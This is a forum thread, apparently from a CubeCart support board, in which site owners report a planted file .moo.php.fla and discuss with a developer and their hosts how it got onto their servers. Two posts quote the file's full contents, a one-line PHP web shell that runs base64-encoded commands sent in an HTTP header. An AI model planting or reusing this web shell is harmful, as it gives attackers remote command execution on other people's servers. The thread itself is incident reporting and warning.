Jump to content

.moo.php.fla


sleepyfrog

Recommended Posts

The file .moo.php.fla appeared in my images/uploads folder

The file contains

<?php error_reporting(0);${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?>

Which seems to just print out the writable status of the folder

I have deleted the file but want to warn other people in case it is a hacker targetting cubecart installs

Link to comment
Share on other sites

Also had this file appear and a variation .moo.php(1).fla both in the images/uploads folder seems also to have appeared on the 22nd June. They don't open in flash and size of file when properties are check is different 1kb and 4kb suggesting possible hidden coding.

I've deleted them from my server. They don't trigger spyware or virus warnings when scanned. No idea what they are. Both were set to 777 which is odd as my image folders are set to 755

Any info much appreciated as currently unable to track the source.

update: this made interesting reading, is this what's happening if so is there a security hole in 4.3.3 ? and how quick can it be fixed?

Encapsulating CSRF attacks http://blog.guya.net/category/flash-security/

and Google searches for <?php error_reporting(0);${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?> references several possible code exploit options

I think this needs checking out asap

15.12pm further update: I've spoken to my server host and they say it appears the files were uploaded through cubecart. I'm posting a bug report on this.

Link to comment
Share on other sites

15.12pm further update: I've spoken to my server host and they say it appears the files were uploaded through cubecart. I'm posting a bug report on this.

There are no known security holes. Can you ask them for evidence for this claim? This will then show us if/how we can patch it.

FYI most budget hosting providers can have hundreds or thousands of accounts per server. It only takes one bad piece of code for every account holder on the server to have their service affected. If one bad piece of code somewhere on the server allows an bad PHP script to be uploaded it can spawn throughout the server and copy its self to every world writeable folder such as the images/uploads folder on any account holder on the server either.

I would say that this issue not likely to be a CubeCart security hole but a downside of shared hosting. There really is nothing we can do to investigate until some one shows us a server access log or some other kind of log of activity around CubeCart and this file.

Link to comment
Share on other sites

Hi Al,

we're not set up on a budget server, our site is hosted on a VDS restricted to 12 accounts per server. Still a risk element I know but not as bad as a budget space. Unfortunately as I'm in charge of the space I'd didnt realise I hadn't set the log files to archive so I dont have a raw log file for the date the files appeared. I do have some other data and I will go through those and see if I can find anything unusual.

Support at the hosting compay suggested that access may ahve been gain via Cubecarts upload facility, I assume they mean pciture manager, but again I don't have the evidence to support this.

Link to comment
Share on other sites

Yeah that makes a difference. Can you "grep" the logfiles to look for this file name or any of the "rte" paths.

I've got my server support looking into this for me, I'll pass your request on and get back as soon as we have more info.

Link to comment
Share on other sites

Sorry Al drawn a blank as I forgot to set the logs up properly, the following is the response from my support:

I have investigated and do not believe the account was accessed by FTP or the server control panel, but can't confirm how the file was uploaded as I don't have the raw HTTP logs. The system also runs suhosin and uses the latest version of PHP, and there haven't been any root SSH logins

Link to comment
Share on other sites

  • 3 weeks later...
  • 2 months later...
Guest amnesiac

I just found 2 files in our images/uploads folder.

Files:

-moo.php.fla

.moo.php.fla

Code in files (actually is a PHP file):

<?php error_reporting(0);${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?>

I contacted our host and will see what they say. I also noticed it on another site I did awhile back.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...